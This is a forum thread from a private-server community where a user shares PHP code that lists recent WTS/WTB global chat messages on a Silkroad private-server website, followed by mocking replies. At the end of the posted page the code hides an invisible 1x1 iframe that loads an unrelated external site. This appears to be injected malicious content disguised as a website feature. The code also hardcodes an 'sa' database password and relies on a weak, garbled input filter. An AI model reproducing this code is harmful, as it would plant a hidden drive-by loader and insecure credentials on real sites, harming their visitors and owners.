Register for your free account! | Forgot your password?

You last visited: Today at 01:17

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Add Glopal System in Your Website

Discussion on Add Glopal System in Your Website within the SRO PServer Guides & Releases forum part of the SRO Private Server category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Jan 2015
Posts: 94
Received Thanks: 115
Add Glopal System in Your Website

Hello Guys
--------------------------------------
Add Glopal System in Your Website
-------------------------------------
Screen

------------------------------------
PHP Code:
<?php
$ip 
$_SERVER['REMOTE_ADDR'];
$time date("l dS of F Y h:i:s A");
$script $_SERVER[PATH_TRANSLATED];
$fp fopen ("[WEB]SQL_Injection.txt""a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("""","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear 
$_GET */
for(
$i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if(
$real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite (
$fp, "IP$ip\r\n");
fwrite (
$fp, "MethodGET\r\n");
fwrite (
$fp, "Value$real_get[$i]\r\n");
fwrite (
$fp, "Script$script\r\n");
fwrite (
$fp, "Time$time\r\n");
fwrite (
$fp, "==================================\r\n");
}
}
/*end clear 
$_GET */
/*begin clear 
$_POST */
for(
$i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if(
$real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite (
$fp, "IP$ip\r\n");
fwrite (
$fp, "MethodPOST\r\n");
fwrite (
$fp, "Value$real_post[$i]\r\n");
fwrite (
$fp, "Script$script\r\n");
fwrite (
$fp, "Time$time\r\n");
fwrite (
$fp, "==================================\r\n");
}
}
/*end clear 
$_POST */
/*begin clear 
$_COOKIE */
for(
$i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1$sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if(
$real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite (
$fp, "IP$ip\r\n");
fwrite (
$fp, "MethodCOOKIE\r\n");
fwrite (
$fp, "Value$real_cookie[$i]\r\n");
fwrite (
$fp, "Script$script\r\n");
fwrite (
$fp, "Time$time\r\n");
fwrite (
$fp, "==================================\r\n");
}
}

/*end clear 
$_COOKIE */
fclose (
$fp);
?>


  <div id=page_top></div>

      <div id=page_content style='min-height: 750px;'>
 <div style='background:url(img/news_top.png) no-repeat;width:481px;height:32px;margin-left:11px;color:#White'>
<div id="
spc_head"><center><p><h1><font color="white">Last 30 Global WTB or WTS (New)</font></h1></p></center></div>

  <?php
    
$server_name = "Vortex-onlie";                //Server name
    
$host          = "VMI32631\SQLEXPRESS";           // SQL server name for example PC-NAME\SQLEXPRESS
    
$user          = "sa";                  // SQL username
    
$pass         = "dusty@123";              // SQL password
    
$db           = "SRO_VT_ACCOUNT";      // SQL Database;
    
$show         = "30";               //Show top 10 for example
?>
<!-- Coded by ThElitEyeS -->
<html>
    <head>

        <style type="
text/css">
         <!--
            body
  table { border-collapse: collapse; text-align: left; width: 100%; }   {font: normal 15px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #White; }  table td,   table th { padding: 0px 13px; }  table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #White), color-stop(1, #White) );background:-moz-linear-gradient( center top, #White 5%, #White 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#White', endColorstr='#White');background-color:#White; color:#White; font-size: 15px; font-weight: bold; border-left: 0px solid #White; }   table thead th:first-child { border: none; }  table tbody td { color: #1DA118; border-left: 1px solid #BC2ED9;font-size: 15px;font-weight: bold; }  table tbody .alt td { background: #D8F4AD; color: #23DBC9; }  table tbody td:first-child { border-left: none; }  table tbody tr:last-child td { border-bottom: none; }  table tfoot td div { border-top: 1px solid #White;background: #White;}   table tfoot td { padding: 0; font-size: 12px }   table tfoot td div{ padding: 2px; }
            !-->
        </style>
    </head>
    <body>
        <?php
            @
$connect = odbc_connect("Driver={SQL Server};Server={".$host."}; Database={".$db."}", "".$user."", "".$pass."") or die("<center><b style=\"border:1px dashed #FF0000;\">".str_replace("[Microsoft][ODBC SQL Server Driver][SQL Server]"""odbc_errormsg())."</b></center>");
            @
odbc_result_all(odbc_exec($connect"SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or  msg like '%WTB%' order by time desc"));
        
?>

    <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe>
</body>
</html>
X-Vortex is offline  
Thanks
4 Users
Old 03/19/2015, 11:44   #2
 
elite*gold: 41
Join Date: Oct 2012
Posts: 2,216
Received Thanks: 1,196
Glopal how it comes
Crue* is offline  
Thanks
4 Users
Old 03/19/2015, 11:48   #3

 
KingDollar's Avatar
 
elite*gold: 1117
Join Date: Dec 2013
Posts: 858
Received Thanks: 806
Quote:
Originally Posted by Crue* View Post
Glopal how it comes
xD i was would to like to ask the same question
KingDollar is offline  
Thanks
2 Users
Old 03/19/2015, 12:41   #4
 
elite*gold: 0
Join Date: Jan 2015
Posts: 94
Received Thanks: 115
Last 20 Glopal Wts or Wtb
X-Vortex is offline  
Thanks
3 Users
Old 03/19/2015, 13:23   #5
 
Storxy_'s Avatar
 
elite*gold: 0
Join Date: Oct 2014
Posts: 204
Received Thanks: 407
can you tell me who code this !
and how you get it !!!
Storxy_ is offline  
Thanks
1 User
Old 03/19/2015, 13:25   #6
 
ledgervera's Avatar
 
elite*gold: 80
Join Date: May 2014
Posts: 199
Received Thanks: 456
What a shame, it's from rebecca website.

Quote:
Originally Posted by X-Vortex View Post
Last 20 Glopal Wts or Wtb
PHP Code:
"SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or  msg like '%WTB%' order by time desc" 
ledgervera is offline  
Thanks
2 Users
Old 03/19/2015, 14:30   #7
 
elite*gold: 0
Join Date: Jan 2015
Posts: 94
Received Thanks: 115
Quote:
Originally Posted by Eric1337* View Post
What a shame, it's from rebecca website.



PHP Code:
"SELECT TOP 24 sender,msg from srZor_globalChatLog where msg like'%WTS%' or  msg like '%WTB%' order by time desc" 
Yes it's From Rebecca Site im not Take Cridets to My self
Just i want Help People's
X-Vortex is offline  
Thanks
3 Users
Old 03/19/2015, 16:32   #8
 
gigola123's Avatar
 
elite*gold: 0
Join Date: Jun 2007
Posts: 722
Received Thanks: 390
Huh...
gigola123 is offline  
Old 03/19/2015, 16:54   #9

 
Dallin¥'s Avatar
 
elite*gold: 33
Join Date: Mar 2014
Posts: 472
Received Thanks: 862
Dallin¥ is offline  
Thanks
6 Users
Old 03/19/2015, 17:00   #10
 
elite*gold: 0
Join Date: Jan 2015
Posts: 94
Received Thanks: 115
Quote:
Originally Posted by M̷r̷.̷X̷ View Post
Huuuh Just Wait Me In Fb
X-Vortex is offline  
Thanks
3 Users
Old 03/19/2015, 21:24   #11
 
elite*gold: 41
Join Date: Oct 2012
Posts: 2,216
Received Thanks: 1,196
Quote:
Originally Posted by X-Vortex View Post
Huuuh Just Wait Me In Fb
ehh he should take care from you.
Crue* is offline  
Thanks
1 User
Old 03/19/2015, 21:26   #12
 
elite*gold: 0
Join Date: Jan 2015
Posts: 94
Received Thanks: 115
Quote:
Originally Posted by Crue* View Post
ehh he should take care from you.
Yea
X-Vortex is offline  
Thanks
3 Users
Old 03/19/2015, 21:56   #13

 
KingDollar's Avatar
 
elite*gold: 1117
Join Date: Dec 2013
Posts: 858
Received Thanks: 806
Glopal and Cridets
ahh are you turk man?
KingDollar is offline  
Thanks
1 User
Old 03/20/2015, 04:22   #14
 
Justin1337*'s Avatar
 
elite*gold: 480
Join Date: Jan 2012
Posts: 655
Received Thanks: 579
What is a Glopal?
Justin1337* is offline  
Thanks
1 User
Old 03/20/2015, 11:05   #15
 
elite*gold: 0
Join Date: Aug 2013
Posts: 82
Received Thanks: 34
Quote:
Originally Posted by Justin1337* View Post
What is a Glopal?
ites etem u uze it make shat yello for aool serfer

the reality behind the "Glopal" xD
_Miss_AngeL_ is offline  
Reply


Similar Threads Similar Threads
Rohan CMS(Website system)
04/11/2015 - Rohan - 22 Replies
Hello guys here i wanna show you my work :) Maybe i am gonna sell this soon. Functions: 1.Index page 2.Register system 3.Change password system 4.Teleport system -Teleport to Upper -Teleport to Lower -Teleport to R5 5.Add stats system
[S] Login System für Website
06/24/2014 - elite*gold Trading - 2 Replies
Hallo ich suche jemanden, der mir ein Benutzersystem für meine Website macht. Das heißt: registrierungen möglich einloggen möglich auch, dass wenn man eingeloggt ist, man ein extra feld auf der Website hat, was man anklicken kann ( können unregistriere/bzw. nicht eingeloggte nicht!). Es sollte auch eine art Coinsystem beinhalten. Welches zeigt, wie viel Coins auf einem Benutzer drauf sind. Beispielt
[Coding]New type website system
05/20/2012 - SRO Private Server - 69 Replies
Hello Epvps, Well our team is working back and coding new type of website system which no 1 has done till now ^^ well we have done our old website TitanSro but it got stolen by our own team member's and released it .Well we don't care about it because it was just our test well this time we did a Unique system of registration and much more coming soon ..Well its still not designed but it looks pretty good Like : http://acp.titansro.com/ Tell me your opinion what else more need to add we...
[Release]Ticket system for Metin2/Website
12/04/2011 - Metin2 PServer Guides & Strategies - 8 Replies
removed my content due to racist community members (again) Learn to respect you stupid little kids.



All times are GMT +1. The time now is 01:19.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.